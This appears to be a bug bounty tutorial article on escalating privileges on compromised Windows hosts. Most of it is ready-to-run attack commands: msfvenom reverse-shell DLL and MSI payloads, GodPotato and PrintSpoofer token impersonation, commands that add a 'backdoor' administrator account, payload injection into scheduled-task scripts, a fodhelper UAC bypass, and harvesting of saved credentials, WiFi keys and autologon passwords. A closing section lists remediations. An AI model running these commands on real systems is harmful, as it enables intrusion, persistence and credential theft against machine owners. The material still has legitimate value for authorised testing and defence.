Why Windows Privilege Escalation Matters for Bug Bounty

If you've landed a shell on a Windows target — through a web app RCE, phishing simulation, or exposed service — you're almost certainly running as a low-privilege user. The real impact comes from escalating to SYSTEM or Administrator, where you can access credentials, pivot laterally, and demonstrate full compromise.

Bug bounty programs that include desktop applications, enterprise environments, VDI infrastructure, or Microsoft products explicitly reward privilege escalation findings. Even web-focused programs care when you can chain a web vulnerability into local access and then escalate — that's the difference between a medium and a critical severity report.

Enumeration: The Foundation of Every Privesc

Before exploiting anything, you need to understand the target system. Enumeration is where 90% of privesc work happens.

Manual Enumeration Commands

Start with these commands from any shell:

# System info and patch level
systeminfo
wmic qfe list brief

# Current user and privileges
whoami /all
whoami /priv

# Local users and groups
net user
net localgroup administrators

# Running services
wmic service list brief
sc query state= all

# Scheduled tasks
schtasks /query /fo LIST /v

# Installed software
wmic product get name,version

# Network connections
netstat -ano

# Environment variables (look for credentials)
set

Automated Enumeration with WinPEAS

WinPEAS is the go-to automated enumeration tool. It checks hundreds of potential privesc vectors and color-codes findings by severity:

# Run WinPEAS with all checks
.\winPEASany.exe quiet

# Focus on specific areas
.\winPEASany.exe quiet servicesinfo
.\winPEASany.exe quiet applicationsinfo

Pay close attention to RED and YELLOW findings — these are the most likely exploitable vectors.

PowerUp for Misconfiguration Checks

# Import and run all checks
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Check specific vectors
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService

Service Misconfigurations

Windows services run with specific privileges — often as SYSTEM. If you can modify how a service runs, you inherit those privileges.

Unquoted Service Paths

When a service binary path contains spaces and isn't quoted, Windows tries multiple path interpretations:

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Example: A service with path
# C:\Program Files\My App\Service\binary.exe
# Windows tries:
# C:\Program.exe
# C:\Program Files\My.exe
# C:\Program Files\My App\Service\binary.exe

If you can write to any of the intermediate directories, drop a malicious executable at the earlier path and restart the service.

Weak Service Permissions

If you can modify a service's configuration, you can change its binary path to point to your payload:

# Check service permissions with accesschk
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *

# If you have SERVICE_CHANGE_CONFIG permission:
sc config VulnService binpath= "C:\temp\shell.exe"
sc stop VulnService
sc start VulnService

Writable Service Binaries

# Check if you can write to the service binary itself
icacls "C:\Program Files\VulnApp\service.exe"

# If writable, replace with your payload
copy /Y C:\temp\shell.exe "C:\Program Files\VulnApp\service.exe"
sc stop VulnService
sc start VulnService

Token Impersonation Attacks

Service accounts often have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. These privileges let you impersonate tokens from other processes — including SYSTEM.

Checking Your Privileges

whoami /priv

# Look for:
# SeImpersonatePrivilege - Enabled
# SeAssignPrimaryTokenPrivilege - Enabled

GodPotato (2026 Recommended)

GodPotato works on Windows Server 2012 through 2025 and Windows 10/11. It's the most reliable potato attack in 2026:

# Execute command as SYSTEM
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "cmd /c net user backdoor Password123! /add && net localgroup administrators backdoor /add"

PrintSpoofer

Exploits the Print Spooler service for impersonation — works when the spooler is running:

.\PrintSpoofer64.exe -i -c powershell.exe

DLL Hijacking

When an application loads a DLL, Windows searches directories in a specific order. If you can place a malicious DLL earlier in the search path, it gets loaded instead.

# Find DLL hijacking opportunities with Process Monitor
# Filter: Result = NAME NOT FOUND, Path ends with .dll

# Common hijackable locations:
# - Application directory (if writable)
# - Current working directory
# - System PATH directories (if writable)

# Generate a malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f dll -o hijack.dll

DLL Search Order

1. Directory from which the application loaded
2. System directory (C:\Windows\System32)
3. 16-bit system directory
4. Windows directory (C:\Windows)
5. Current directory
6. Directories in PATH environment variable

Always-Install-Elevated

If both of these registry keys are set to 1, any user can install MSI packages with SYSTEM privileges:

# Check the registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both return 0x1, generate a malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi

# Install it
msiexec /quiet /qn /i shell.msi

Scheduled Task Exploitation

Scheduled tasks that run as SYSTEM with writable scripts or binaries are prime targets:

# List scheduled tasks with details
schtasks /query /fo LIST /v | findstr /i "task\|run as\|task to run"

# Check permissions on the task's binary/script
icacls "C:\Scripts\backup.ps1"

# If writable, inject your payload
echo "cmd /c net user backdoor Password123! /add" >> C:\Scripts\backup.ps1

UAC Bypass Techniques

User Account Control prevents medium-integrity processes from performing admin actions. If your user is in the Administrators group but running at medium integrity, UAC bypass gets you to high integrity without the consent prompt.

Fodhelper Bypass

# Classic fodhelper UAC bypass — works on Windows 10/11
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "cmd.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /f
fodhelper.exe

# Clean up
reg delete "HKCU\Software\Classes\ms-settings" /f

UACME

The UACME project catalogs dozens of UAC bypass methods. Many still work in 2026 on unpatched or misconfigured systems:

# UACME with method 23 (sdclt.exe)
.\Akagi64.exe 23 C:\temp\shell.exe

Credential Harvesting for Escalation

Sometimes the fastest path to SYSTEM is finding stored credentials:

# Saved credentials
cmdkey /list

# If credentials exist, use runas
runas /savecred /user:Administrator cmd.exe

# Search for passwords in files
findstr /si "password" *.txt *.ini *.config *.xml
findstr /si "connectionstring" *.config

# WiFi passwords (lateral movement)
netsh wlan show profiles
netsh wlan show profile name="NetworkName" key=clear

# Registry autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Kernel Exploits

When misconfigurations don't exist, kernel exploits are the last resort. Match the target's patch level against known vulnerabilities:

# Get exact build and patch info
systeminfo | findstr /i "os version\|hotfix"

# Use Watson to find missing patches
.\Watson.exe

# Use windows-exploit-suggester
python windows-exploit-suggester.py --database 2026-04-14-mssb.xls --systeminfo sysinfo.txt

Notable kernel exploits still relevant in 2026 for unpatched systems:

• CVE-2024-30088 — Windows Kernel elevation of privilege
• CVE-2024-21338 — AppLocker driver (BYOVD variant)
• CVE-2023-36874 — Windows Error Reporting Service

Building Escalation Chains for Bug Bounty Reports

The highest-impact bug bounty reports chain multiple findings together. Here's a template for structuring your privesc report:

1. Initial Access: How you got a shell (web RCE, exposed service, etc.)
2. Enumeration: What you found during system reconnaissance
3. Exploitation: The specific privesc technique used, with exact commands
4. Impact: What SYSTEM access enables — credential dumping, lateral movement, data access
5. Remediation: Specific fixes for each misconfiguration in the chain

Defensive Checks to Note in Reports

When writing your bug bounty report, include remediation guidance:

• Quote all service paths and audit with wmic service get pathname
• Remove SeImpersonatePrivilege from service accounts that don't need it
• Disable AlwaysInstallElevated via Group Policy
• Audit scheduled task permissions and run tasks with least-privilege accounts
• Enable Credential Guard to protect against token theft
• Keep systems patched — kernel exploits are the easiest class to prevent

Related Articles

• SSRF to RCE Escalation for Bug Bounty in 2026
• Race Condition Testing for Bug Bounty in 2026
• CI/CD Pipeline Security Testing for Bug Bounty in 2026
• Supply Chain Attack Testing for Bug Bounty in 2026
• Kubernetes Security Testing for Bug Bounty in 2026